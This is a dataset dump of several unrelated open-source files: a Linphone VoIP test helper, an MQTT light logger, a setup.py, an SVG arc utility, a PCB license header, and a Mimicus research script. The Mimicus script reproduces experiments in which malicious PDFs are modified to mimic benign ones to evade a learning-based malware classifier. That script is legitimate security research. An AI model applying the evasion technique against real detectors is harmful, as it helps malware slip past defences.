def wait_for_list(cls, managers, func, timeout):
start = datetime.now()
end = start + timedelta(milliseconds = timeout)
res = func(*managers)
while not res and datetime.now() < end:
for manager in managers:
manager.lc.iterate()
time.sleep(0.02)
res = func(*managers)
return res
@classmethod
def wait_for(cls, manager1, manager2, func):
return cls.wait_for_until(manager1, manager2, func, 10000)
@classmethod
def call(cls, caller_manager, callee_manager, caller_params = None, callee_params = None, build_callee_params = False):
initial_caller_stats = deepcopy(caller_manager.stats)
initial_callee_stats = deepcopy(callee_manager.stats)
# Use playfile for callee to avoid locking on capture card
callee_manager.lc.use_files = True
callee_manager.lc.play_file = os.path.join(tester_resources_path, 'sounds', 'hello8000.wav')
if caller_params is None:
call = caller_manager.lc.invite_address(callee_manager.identity)
else:
call = caller_manager.lc.invite_address_with_params(callee_manager.identity, caller_params)
assert call is not None
assert_equals(CoreManager.wait_for(callee_manager, caller_manager,
lambda callee_manager, caller_manager: callee_manager.stats.number_of_LinphoneCallIncomingReceived == initial_callee_stats.number_of_LinphoneCallIncomingReceived + 1), True)
assert_equals(callee_manager.lc.incoming_invite_pending, True)
assert_equals(caller_manager.stats.number_of_LinphoneCallOutgoingProgress, initial_caller_stats.number_of_LinphoneCallOutgoingProgress + 1)
retry = 0
while (caller_manager.stats.number_of_LinphoneCallOutgoingRinging != initial_caller_stats.number_of_LinphoneCallOutgoingRinging + 1) and \
(caller_manager.stats.number_of_LinphoneCallOutgoingEarlyMedia != initial_caller_stats.number_of_LinphoneCallOutgoingEarlyMedia + 1) and \
retry < 20:
retry += 1
caller_manager.lc.iterate()
callee_manager.lc.iterate()
time.sleep(0.1)
assert ((caller_manager.stats.number_of_LinphoneCallOutgoingRinging == initial_caller_stats.number_of_LinphoneCallOutgoingRinging + 1) or \
(caller_manager.stats.number_of_LinphoneCallOutgoingEarlyMedia == initial_caller_stats.number_of_LinphoneCallOutgoingEarlyMedia + 1)) == True
assert callee_manager.lc.current_call_remote_address is not None
if caller_manager.lc.current_call is None or callee_manager.lc.current_call is None or callee_manager.lc.current_call_remote_address is None:
return False
callee_from_address = caller_manager.identity.clone()
callee_from_address.port = 0 # Remove port because port is never present in from header
assert_equals(callee_from_address.weak_equal(callee_manager.lc.current_call_remote_address), True)
if callee_params is not None:
callee_manager.lc.accept_call_with_params(callee_manager.lc.current_call, callee_params)
elif build_callee_params:
default_params = callee_manager.lc.create_call_params(callee_manager.lc.current_call)
callee_manager.lc.accept_call_with_params(callee_manager.lc.current_call, default_params)
else:
callee_manager.lc.accept_call(callee_manager.lc.current_call)
assert_equals(CoreManager.wait_for(callee_manager, caller_manager,
lambda callee_manager, caller_manager: (callee_manager.stats.number_of_LinphoneCallConnected == initial_callee_stats.number_of_LinphoneCallConnected + 1) and \
(caller_manager.stats.number_of_LinphoneCallConnected == initial_caller_stats.number_of_LinphoneCallConnected + 1)), True)
# Just to sleep
result = CoreManager.wait_for(callee_manager, caller_manager,
lambda callee_manager, caller_manager: (callee_manager.stats.number_of_LinphoneCallStreamsRunning == initial_callee_stats.number_of_LinphoneCallStreamsRunning + 1) and \
(caller_manager.stats.number_of_LinphoneCallStreamsRunning == initial_caller_stats.number_of_LinphoneCallStreamsRunning + 1))
if caller_manager.lc.media_encryption != linphone.MediaEncryption.MediaEncryptionNone and callee_manager.lc.media_encryption != linphone.MediaEncryption.None:
# Wait for encryption to be on, in case of zrtp, it can take a few seconds
if caller_manager.lc.media_encryption == linphone.MediaEncryption.ZRTP:
CoreManager.wait_for(callee_manager, caller_manager,
lambda callee_manager, caller_manager: caller_manager.stats.number_of_LinphoneCallEncryptedOn == initial_caller_stats.number_of_LinphoneCallEncryptedOn + 1)
if callee_manager.lc.media_encryption == linphone.MediaEncryption.ZRTP:
CoreManager.wait_for(callee_manager, caller_manager,
lambda callee_manager, caller_manager: callee_manager.stats.number_of_LinphoneCallEncryptedOn == initial_callee_stats.number_of_LinphoneCallEncryptedOn + 1)
assert_equals(callee_manager.lc.current_call.current_params.media_encryption, caller_manager.lc.media_encryption)
assert_equals(caller_manager.lc.current_call.current_params.media_encryption, callee_manager.lc.media_encryption)
return result
@classmethod
def end_call(cls, caller_manager, callee_manager):
caller_manager.lc.terminate_all_calls()
assert_equals(CoreManager.wait_for(caller_manager, callee_manager,
lambda caller_manager, callee_manager: caller_manager.stats.number_of_LinphoneCallEnd == 1 and callee_manager.stats.number_of_LinphoneCallEnd == 1), True)
@classmethod
def registration_state_changed(cls, lc, cfg, state, message):
manager = lc.user_data()
linphonetester_logger.info("[TESTER] New registration state {state} for user id [{identity}] at proxy [{addr}]".format(
state=linphone.RegistrationState.string(state), identity=cfg.identity_address.as_string(), addr=cfg.server_addr))
if state == linphone.RegistrationState.None:
manager.stats.number_of_LinphoneRegistrationNone += 1
elif state == linphone.RegistrationState.Progress:
manager.stats.number_of_LinphoneRegistrationProgress += 1
elif state == linphone.RegistrationState.Ok:
manager.stats.number_of_LinphoneRegistrationOk += 1
elif state == linphone.RegistrationState.Cleared:
manager.stats.number_of_LinphoneRegistrationCleared += 1
elif state == linphone.RegistrationState.Failed:
manager.stats.number_of_LinphoneRegistrationFailed += 1
else:
raise Exception("Unexpected registration state")
@classmethod
def auth_info_requested(cls, lc, realm, username, domain):
manager = lc.user_data()
linphonetester_logger.info("[TESTER] Auth info requested for user id [{username}] at realm [{realm}]".format(
username=username, realm=realm))
manager.stats.number_of_auth_info_requested +=1
@classmethod
def call_state_changed(cls, lc, call, state, msg):
manager = lc.user_data()
to_address = call.call_log.to_address.as_string()
from_address = call.call_log.from_address.as_string()
direction = "Outgoing"
if call.call_log.dir == linphone.CallDir.Incoming:
direction = "Incoming"
linphonetester_logger.info("[TESTER] {direction} call from [{from_address}] to [{to_address}], new state is [{state}]".format(
direction=direction, from_address=from_address, to_address=to_address, state=linphone.CallState.string(state)))
if state == linphone.CallState.IncomingReceived:
manager.stats.number_of_LinphoneCallIncomingReceived += 1
elif state == linphone.CallState.OutgoingInit:
manager.stats.number_of_LinphoneCallOutgoingInit += 1
elif state == linphone.CallState.OutgoingProgress:
manager.stats.number_of_LinphoneCallOutgoingProgress += 1
elif state == linphone.CallState.OutgoingRinging:
manager.stats.number_of_LinphoneCallOutgoingRinging += 1
elif state == linphone.CallState.OutgoingEarlyMedia:
manager.stats.number_of_LinphoneCallOutgoingEarlyMedia += 1
elif state == linphone.CallState.Connected:
manager.stats.number_of_LinphoneCallConnected += 1
elif state == linphone.CallState.StreamsRunning:
manager.stats.number_of_LinphoneCallStreamsRunning += 1
elif state == linphone.CallState.Pausing:
manager.stats.number_of_LinphoneCallPausing += 1
elif state == linphone.CallState.Paused:
manager.stats.number_of_LinphoneCallPaused += 1
elif state == linphone.CallState.Resuming:
manager.stats.number_of_LinphoneCallResuming += 1
elif state == linphone.CallState.Refered:
manager.stats.number_of_LinphoneCallRefered += 1
elif state == linphone.CallState.Error:
manager.stats.number_of_LinphoneCallError += 1
elif state == linphone.CallState.End:
manager.stats.number_of_LinphoneCallEnd += 1
elif state == linphone.CallState.PausedByRemote:
manager.stats.number_of_LinphoneCallPausedByRemote += 1
elif state == linphone.CallState.UpdatedByRemote:
manager.stats.number_of_LinphoneCallUpdatedByRemote += 1
elif state == linphone.CallState.IncomingEarlyMedia:
manager.stats.number_of_LinphoneCallIncomingEarlyMedia += 1
elif state == linphone.CallState.Updating:
manager.stats.number_of_LinphoneCallUpdating += 1
elif state == linphone.CallState.Released:
manager.stats.number_of_LinphoneCallReleased += 1
else:
raise Exception("Unexpected call state")
@classmethod
def message_received(cls, lc, room, message):
manager = lc.user_data()
from_str = message.from_address.as_string()
text_str = message.text
external_body_url = message.external_body_url
linphonetester_logger.info("[TESTER] Message from [{from_str}] is [{text_str}], external URL [{external_body_url}]".format(
from_str=from_str, text_str=text_str, external_body_url=external_body_url))
manager.stats.number_of_LinphoneMessageReceived += 1
manager.stats.last_received_chat_message = message
if message.file_transfer_information is not None:
manager.stats.number_of_LinphoneMessageReceivedWithFile += 1
elif message.external_body_url is not None:
manager.stats.number_of_LinphoneMessageExtBodyReceived += 1
@classmethod
def new_subscription_requested(cls, lc, lf, url):
manager = lc.user_data()
linphonetester_logger.info("[TESTER] New subscription request: from [{from_str}], url [{url}]".format(
from_str=lf.address.as_string(), url=url))
manager.stats.number_of_NewSubscriptionRequest += 1
lc.add_friend(lf) # Accept subscription
@classmethod
def notify_presence_received(cls, lc, lf):
manager = lc.user_data()
linphonetester_logger.info("[TESTER] New notify request: from [{from_str}]".format(
from_str=lf.address.as_string()))
manager.stats.number_of_NotifyReceived += 1
manager.stats.last_received_presence = lf.presence_model
acttype = manager.stats.last_received_presence.activity.type
if acttype == linphone.PresenceActivityType.Offline:
manager.stats.number_of_LinphonePresenceActivityOffline += 1
elif acttype == linphone.PresenceActivityType.Online:
manager.stats.number_of_LinphonePresenceActivityOnline += 1
elif acttype == linphone.PresenceActivityType.Appointment:
manager.stats.number_of_LinphonePresenceActivityAppointment += 1
elif acttype == linphone.PresenceActivityType.Away:
manager.stats.number_of_LinphonePresenceActivityAway += 1
elif acttype == linphone.PresenceActivityType.Breakfast:
manager.stats.number_of_LinphonePresenceActivityBreakfast += 1
elif acttype == linphone.PresenceActivityType.Busy:
manager.stats.number_of_LinphonePresenceActivityBusy += 1
elif acttype == linphone.PresenceActivityType.Dinner:
manager.stats.number_of_LinphonePresenceActivityDinner += 1
elif acttype == linphone.PresenceActivityType.Holiday:
manager.stats.number_of_LinphonePresenceActivityHoliday += 1
elif acttype == linphone.PresenceActivityType.InTransit:
manager.stats.number_of_LinphonePresenceActivityInTransit += 1
elif acttype == linphone.PresenceActivityType.LookingForWork:
manager.stats.number_of_LinphonePresenceActivityLookingForWork += 1
elif acttype == linphone.PresenceActivityType.Lunch:
manager.stats.number_of_LinphonePresenceActivityLunch += 1
elif acttype == linphone.PresenceActivityType.Meal:
manager.stats.number_of_LinphonePresenceActivityMeal += 1
elif acttype == linphone.PresenceActivityType.Meeting:
manager.stats.number_of_LinphonePresenceActivityMeeting += 1
elif acttype == linphone.PresenceActivityType.OnThePhone:
manager.stats.number_of_LinphonePresenceActivityOnThePhone += 1
elif acttype == linphone.PresenceActivityType.Other:
manager.stats.number_of_LinphonePresenceActivityOther += 1
elif acttype == linphone.PresenceActivityType.Performance:
manager.stats.number_of_LinphonePresenceActivityPerformance += 1
elif acttype == linphone.PresenceActivityType.PermanentAbsence:
manager.stats.number_of_LinphonePresenceActivityPermanentAbsence += 1
elif acttype == linphone.PresenceActivityType.Playing:
manager.stats.number_of_LinphonePresenceActivityPlaying += 1
elif acttype == linphone.PresenceActivityType.Presentation:
manager.stats.number_of_LinphonePresenceActivityPresentation += 1
elif acttype == linphone.PresenceActivityType.Shopping:
manager.stats.number_of_LinphonePresenceActivityShopping += 1
elif acttype == linphone.PresenceActivityType.Sleeping:
manager.stats.number_of_LinphonePresenceActivitySleeping += 1
elif acttype == linphone.PresenceActivityType.Spectator:
manager.stats.number_of_LinphonePresenceActivitySpectator += 1
elif acttype == linphone.PresenceActivityType.Steering:
manager.stats.number_of_LinphonePresenceActivitySteering += 1
elif acttype == linphone.PresenceActivityType.Travel:
manager.stats.number_of_LinphonePresenceActivityTravel += 1
elif acttype == linphone.PresenceActivityType.TV:
manager.stats.number_of_LinphonePresenceActivityTV += 1
elif acttype == linphone.PresenceActivityType.Unknown:
manager.stats.number_of_LinphonePresenceActivityUnknown += 1
elif acttype == linphone.PresenceActivityType.Vacation:
manager.stats.number_of_LinphonePresenceActivityVacation += 1
elif acttype == linphone.PresenceActivityType.Working:
manager.stats.number_of_LinphonePresenceActivityWorking += 1
elif acttype == linphone.PresenceActivityType.Worship:
manager.stats.number_of_LinphonePresenceActivityWorship += 1
def __init__(self, rc_file = None, check_for_proxies = True, vtable = {}):
if not vtable.has_key('registration_state_changed'):
vtable['registration_state_changed'] = CoreManager.registration_state_changed
if not vtable.has_key('auth_info_requested'):
vtable['auth_info_requested'] = CoreManager.auth_info_requested
if not vtable.has_key('call_state_changed'):
vtable['call_state_changed'] = CoreManager.call_state_changed
if not vtable.has_key('message_received'):
vtable['message_received'] = CoreManager.message_received
#if not vtable.has_key('is_composing_received'):
#vtable['is_composing_received'] = CoreManager.is_composing_received
if not vtable.has_key('new_subscription_requested'):
vtable['new_subscription_requested'] = CoreManager.new_subscription_requested
if not vtable.has_key('notify_presence_received'):
vtable['notify_presence_received'] = CoreManager.notify_presence_received
#if not vtable.has_key('transfer_state_changed'):
#vtable['transfer_state_changed'] = CoreManager.transfer_state_changed
#if not vtable.has_key('info_received'):
#vtable['info_received'] = CoreManager.info_received
#if not vtable.has_key('subscription_state_changed'):
#vtable['subscription_state_changed'] = CoreManager.subscription_state_changed
#if not vtable.has_key('notify_received'):
#vtable['notify_received'] = CoreManager.notify_received
#if not vtable.has_key('publish_state_changed'):
#vtable['publish_state_changed'] = CoreManager.publish_state_changed
#if not vtable.has_key('configuring_status'):
#vtable['configuring_status'] = CoreManager.configuring_status
#if not vtable.has_key('call_encryption_changed'):
#vtable['call_encryption_changed'] = CoreManager.call_encryption_changed
self.identity = None
self.stats = CoreManagerStats()
rc_path = None
if rc_file is not None:
rc_path = os.path.join('rcfiles', rc_file)
self.lc = CoreManager.configure_lc_from(vtable, tester_resources_path, rc_path, self)
self.check_accounts()
if check_for_proxies and rc_file is not None:
proxy_count = len(self.lc.proxy_config_list)
else:
proxy_count = 0
if proxy_count:
CoreManager.wait_for_until(self, None, lambda manager: manager.stats.number_of_LinphoneRegistrationOk == proxy_count, 5000 * proxy_count)
assert_equals(self.stats.number_of_LinphoneRegistrationOk, proxy_count)
self.enable_audio_codec("PCMU", 8000)
if self.lc.default_proxy_config is not None:
self.lc.default_proxy_config.identity_address.clean()
def enable_audio_codec(self, mime, rate):
codecs = self.lc.audio_codecs
for codec in codecs:
self.lc.enable_payload_type(codec, False)
codec = self.lc.find_payload_type(mime, rate, 1)
assert codec is not None
if codec is not None:
self.lc.enable_payload_type(codec, True)
def disable_all_audio_codecs_except_one(self, mime):
self.enable_audio_codec(mime, -1)
def check_accounts(self):
pcl = self.lc.proxy_config_list
for cfg in pcl:
self.identity = account_manager.check_account(cfg)
| gpl-2.0 | 337,906,858,719,774,660 | 50.825243 | 185 | 0.685213 | false | 3.788054 | true | false | false |
ItKindaWorks/ESP8266 | Home Automation/Part 2/MQTT_Logger.py | 1 | 2837 | #!/usr/bin/python
import sys
import os
import paho.mqtt.client as mqtt
import string
import datetime
import time
import logging
#keeps track of when we last turned the light on
onStartTime = 0
##############################
#Create and setup the logging subsystem
logger = None
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
# create a file handler
timeFormat = "%a %b %d %Y %H.%M.%S"
today = datetime.datetime.today()
timestamp = today.strftime(timeFormat)
logFile = 'logs/logs' + timestamp + '.log'
handler = logging.FileHandler(logFile)
handler.setLevel(logging.INFO)
# create a logging format
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(handler)
##############################
def on_message(mqttc, obj, msg):
#define our global vars for logger and the start time tracker
global onStartTime
global logger
#get the local time in an easy to read format
localtime = time.asctime( time.localtime(time.time()) )
#print the message topic and payload for debugging
print msg.topic + " - " + msg.payload
#check to see that the topic is our light1confirm
#- not needed in this example because we are only subscribed to 1 topic as it is
#- but I prefer to play it safe
if (msg.topic == "/house/light1confirm"):
#to do if the message said that we turned the light On
if(msg.payload == "On"):
#take note of when we turned the light on
onStartTime = time.time()
#log the light on time and print
logMessage = "Light turned on at: " + localtime
print logMessage
logger.info(logMessage)
#to do if the message said that we turned the light Off
else:
#take note of the total run time
runTime = time.time() - onStartTime
#log & print when the light turned off
logMessage = "Light turned off at: " + localtime
print logMessage
logger.info(logMessage)
#log & print the total time the light was on for
logMessage = "The light was on for a total of " + str(int(runTime)) + " seconds"
print logMessage
logger.info(logMessage)
#create our MQTT client
mqttc = mqtt.Client()
#tell it what to do when we recieve a message
mqttc.on_message = on_message
#connect to the broker (most likely it is localhost if running MQTT lotcally)
mqttc.connect("127.0.0.1", 1883, 60)
#subscribe to our light confirmation topic
mqttc.subscribe("/house/light1confirm", 0)
#start the MQTT client loop in a separate thread
mqttc.loop_start()
#just loop a bunch - yeah I know this is not the best way to do things
while(True):
time.sleep(1)
| cc0-1.0 | -2,661,853,086,497,558,500 | 26.019048 | 92 | 0.656327 | false | 3.838972 | false | false | false |
srndic/mimicus | reproduction/fig11.py | 1 | 5327 | #!/usr/bin/env python
'''
Copyright 2014 Nedim Srndic, University of Tuebingen
This file is part of Mimicus.
Mimicus is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Mimicus is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Mimicus. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
fig11.py
Reproduction of Figure 11 of the paper "Practical Evasion of a
Learning-Based Classifier: A Case Study" by Nedim Srndic and
Pavel Laskov.
Created on March 21, 2014.
'''
from argparse import ArgumentParser
import multiprocessing
import os
import random
import sys
from matplotlib import pyplot
from mimicus.tools.featureedit import FeatureEdit
from mimicus.tools.datasets import csv2numpy
import common
import config
def mimicry(wolf_fname, sheep_feats, m_id):
'''
Mimics file with the features sheep_feats using the attack file
with the name wolf_fname. Returns the resulting feature vector.
'''
mimic = FeatureEdit(wolf_fname).modify_file(sheep_feats, '/run/shm')
os.remove(mimic['path'])
return mimic['feats'], m_id
def mimicry_wrap(args):
'''
Helper function for calling the mimicry function in parallel.
'''
return mimicry(*args)
def fig11(tr_data, tr_labels, te_data, te_labels, tr_files):
'''
Tests the vaccination defense against the Benign Random Noise (BRN)
attack seeded by results of our mimicry attack against itself and
original, unmodified data. Performs 5 trials.
'''
mal_tr_ind = [i for i, l in enumerate(tr_labels) if l == 1]
ben_tr_ind = [i for i, l in enumerate(tr_labels) if l == 0]
mim_data, mim_labels = common.get_FTC_mimicry()
TRIALS = 5
print '\n{:>6}{:>15}{:>15}'.format('%', 'ORIGINAL', 'OUR MIMICRY')
pool = multiprocessing.Pool(processes=None)
scores = []
for subset in (0, 0.0005, 0.001, 0.005, 0.01, 0.05, 0.1, 0.5, 1):
acc = [0.0, 0.0]
sys.stdout.write('{:>6.2f}'.format(subset * 100))
for _ in range(TRIALS):
tr_mod = tr_data.copy()
# Subsample malicious training files for attack
wolf_ind = random.sample(mal_tr_ind,
int(round(subset * len(mal_tr_ind))))
# Mimic random benign files using the sampled files
pargs = [(tr_data[random.choice(ben_tr_ind)], tr_files[w_id], w_id)
for w_id in wolf_ind]
for mimic, w_id in pool.imap(mimicry_wrap, pargs):
tr_mod[w_id] = mimic
# Evaluate the classifier on both clean test data and mimicry data
res = common.evaluate_classifier(tr_mod,
tr_labels,
[te_data, mim_data],
[te_labels, mim_labels])
acc = [old + new for old, new in zip(acc, res)]
acc = [acc[0] / TRIALS, acc[1] / TRIALS]
print '{:>15.3f}{:>15.3f}'.format(acc[0], acc[1])
scores.append(tuple(acc))
return scores
def main():
random.seed(0)
parser = ArgumentParser()
parser.add_argument('--plot', help='Where to save plot (file name)',
default=False)
parser.add_argument('--show', help='Show plot in a window', default=False)
args = parser.parse_args()
print 'Loading training data from CSV...'
tr_data, tr_labels, tr_fnames = csv2numpy(config.get('datasets',
'contagio'))
print 'Loading test data from CSV...'
te_data, te_labels, _ = csv2numpy(config.get('datasets', 'contagio_test'))
print 'Evaluating...'
scores = fig11(tr_data, tr_labels, te_data, te_labels, tr_fnames)
if not (args.plot or args.show):
return 0
# Plot
original, our_mimicry = zip(*scores)
fig = pyplot.figure()
pyplot.plot(original,
label='Clean data',
marker='o', color='k', linewidth=2)
pyplot.plot(our_mimicry,
label='Our mimicry',
marker='+', color='k', linewidth=2, linestyle=':')
axes = fig.gca()
# Set up axes and labels
axes.yaxis.set_ticks([r / 10.0 for r in range(11)])
axes.yaxis.grid()
axes.set_ylim(0, 1)
axes.set_ylabel('Accuracy')
xticklabels = ['0', '0.05', '0.1', '0.5', '1', '5', '10', '50', '100']
axes.set_xticklabels(xticklabels, rotation=0)
axes.set_xlabel('Training set perturbation (%)')
fig.subplots_adjust(bottom=0.13, top=0.95, left=0.11, right=0.96)
pyplot.legend(loc='lower right')
if args.show:
pyplot.show()
if args.plot:
pyplot.savefig(args.plot, dpi=300, bbox_inches='tight')
return 0
if __name__ == '__main__':
sys.exit(main())
| gpl-3.0 | -3,679,737,953,169,780,000 | 34.993243 | 80 | 0.594706 | false | 3.5 | false | false | false |
ernestyalumni/Propulsion | ccdroplet/setup.py | 1 | 1369 | from setuptools import setup, find_packages
from codecs import open
from os import path
__version__ = '0.0.1'
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# get the dependencies and installs
with open(path.join(here, 'requirements.txt'), encoding='utf-8') as f:
all_reqs = f.read().split('\n')
install_requires = [x.strip() for x in all_reqs if 'git+' not in x]
dependency_links = [x.strip().replace('git+', '') for x in all_reqs if 'git+' not in x]
setup(
name='ccdroplet',
version=__version__,
description='Convective Burning Droplet model for (rocket) Combustion Chambers.',
long_description=long_description,
url='https://github.com/ernestyalumni/Propulsion/ccdroplet',
download_url='https://github.com/ernestyalumni/Propulsion/ccdroplet/tarball/' + __version__,
license='BSD',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Programming Language :: Python :: 3',
],
keywords='',
packages=find_packages(exclude=['docs', 'tests*']),
include_package_data=True,
author='Ernest Yeung',
install_requires=install_requires,
dependency_links=dependency_links,
author_email='[email protected]'
)
| gpl-2.0 | 2,096,139,193,927,262,200 | 33.225 | 96 | 0.680058 | false | 3.431078 | false | false | false |
vocky/svg-flask-test | arc.py | 1 | 6410 | # Copyright (c) 2005-2008, Enthought, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# Neither the name of Enthought, Inc. nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from math import acos, sin, cos, hypot, ceil, sqrt, radians, degrees
import warnings
def bezier_arc(x1, y1, x2, y2, start_angle=0, extent=90):
""" Compute a cubic Bezier approximation of an elliptical arc.
(x1, y1) and (x2, y2) are the corners of the enclosing rectangle.
The coordinate system has coordinates that increase to the right and down.
Angles, measured in degress, start with 0 to the right (the positive X axis)
and increase counter-clockwise.
The arc extends from start_angle to start_angle+extent.
I.e. start_angle=0 and extent=180 yields an openside-down semi-circle.
The resulting coordinates are of the form (x1,y1, x2,y2, x3,y3, x4,y4)
such that the curve goes from (x1, y1) to (x4, y4) with (x2, y2) and
(x3, y3) as their respective Bezier control points.
"""
x1,y1, x2,y2 = min(x1,x2), max(y1,y2), max(x1,x2), min(y1,y2)
if abs(extent) <= 90:
frag_angle = float(extent)
nfrag = 1
else:
nfrag = int(ceil(abs(extent)/90.))
if nfrag == 0:
warnings.warn('Invalid value for extent: %r' % extent)
return []
frag_angle = float(extent) / nfrag
x_cen = (x1+x2)/2.
y_cen = (y1+y2)/2.
rx = (x2-x1)/2.
ry = (y2-y1)/2.
half_angle = radians(frag_angle) / 2
kappa = abs(4. / 3. * (1. - cos(half_angle)) / sin(half_angle))
if frag_angle < 0:
sign = -1
else:
sign = 1
point_list = []
for i in range(nfrag):
theta0 = radians(start_angle + i*frag_angle)
theta1 = radians(start_angle + (i+1)*frag_angle)
c0 = cos(theta0)
c1 = cos(theta1)
s0 = sin(theta0)
s1 = sin(theta1)
if frag_angle > 0:
signed_kappa = -kappa
else:
signed_kappa = kappa
point_list.append((x_cen + rx * c0,
y_cen - ry * s0,
x_cen + rx * (c0 + signed_kappa * s0),
y_cen - ry * (s0 - signed_kappa * c0),
x_cen + rx * (c1 - signed_kappa * s1),
y_cen - ry * (s1 + signed_kappa * c1),
x_cen + rx * c1,
y_cen - ry * s1))
return point_list
def angle(x1, y1, x2, y2):
""" The angle in degrees between two vectors.
"""
sign = 1.0
usign = (x1*y2 - y1*x2)
if usign < 0:
sign = -1.0
num = x1*x2 + y1*y2
den = hypot(x1,y1) * hypot(x2,y2)
ratio = min(max(num/den, -1.0), 1.0)
return sign * degrees(acos(ratio))
def transform_from_local(xp, yp, cphi, sphi, mx, my):
""" Transform from the local frame to absolute space.
"""
x = xp * cphi - yp * sphi + mx
y = xp * sphi + yp * cphi + my
return (x,y)
def elliptical_arc_to(x1, y1, rx, ry, phi, large_arc_flag, sweep_flag, x2, y2):
""" An elliptical arc approximated with Bezier curves or a line segment.
Algorithm taken from the SVG 1.1 Implementation Notes:
http://www.w3.org/TR/SVG/implnote.html#ArcImplementationNotes
"""
# Basic normalization.
rx = abs(rx)
ry = abs(ry)
phi = phi % 360
# Check for certain special cases.
if x1==x2 and y1==y2:
# Omit the arc.
# x1 and y1 can obviously remain the same for the next segment.
return []
if rx == 0 or ry == 0:
# Line segment.
return [(x2,y2)]
rphi = radians(phi)
cphi = cos(rphi)
sphi = sin(rphi)
# Step 1: Rotate to the local coordinates.
dx = 0.5*(x1 - x2)
dy = 0.5*(y1 - y2)
x1p = cphi * dx + sphi * dy
y1p = -sphi * dx + cphi * dy
# Ensure that rx and ry are large enough to have a unique solution.
lam = (x1p/rx)**2 + (y1p/ry)**2
if lam > 1.0:
scale = sqrt(lam)
rx *= scale
ry *= scale
# Step 2: Solve for the center in the local coordinates.
num = max((rx*ry)**2 - (rx*y1p)**2 - (ry*x1p)**2, 0.0)
den = ((rx*y1p)**2 + (ry*x1p)**2)
a = sqrt(num / den)
cxp = a * rx*y1p/ry
cyp = -a * ry*x1p/rx
if large_arc_flag == sweep_flag:
cxp = -cxp
cyp = -cyp
# Step 3: Transform back.
mx = 0.5*(x1+x2)
my = 0.5*(y1+y2)
# Step 4: Compute the start angle and the angular extent of the arc.
# Note that theta1 is local to the phi-rotated coordinate space.
dx = (x1p-cxp) / rx
dy = (y1p-cyp) / ry
dx2 = (-x1p-cxp) / rx
dy2 = (-y1p-cyp) / ry
theta1 = angle(1,0,dx,dy)
dtheta = angle(dx,dy,dx2,dy2)
if not sweep_flag and dtheta > 0:
dtheta -= 360
elif sweep_flag and dtheta < 0:
dtheta += 360
# Step 5: Break it apart into Bezier arcs.
p = []
control_points = bezier_arc(cxp-rx,cyp-ry,cxp+rx,cyp+ry, theta1, dtheta)
for x1p,y1p, x2p,y2p, x3p,y3p, x4p,y4p in control_points:
# Transform them back to asbolute space.
p.append((
transform_from_local(x2p,y2p,cphi,sphi,mx,my) +
transform_from_local(x3p,y3p,cphi,sphi,mx,my) +
transform_from_local(x4p,y4p,cphi,sphi,mx,my)
))
return p | apache-2.0 | -8,595,482,971,694,962,000 | 33.467742 | 97 | 0.625897 | false | 2.914961 | false | false | false |
32bitmicro/EDA | python/eda/eda/pcb.py | 1 | 45843 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2014, Paweł Wodnicki
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the 32bitmicro nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
#ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
#DISCLAIMED. IN NO EVENT SHALL Paweł Wodnicki BE LIABLE FOR ANY
#DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
#LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
#ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
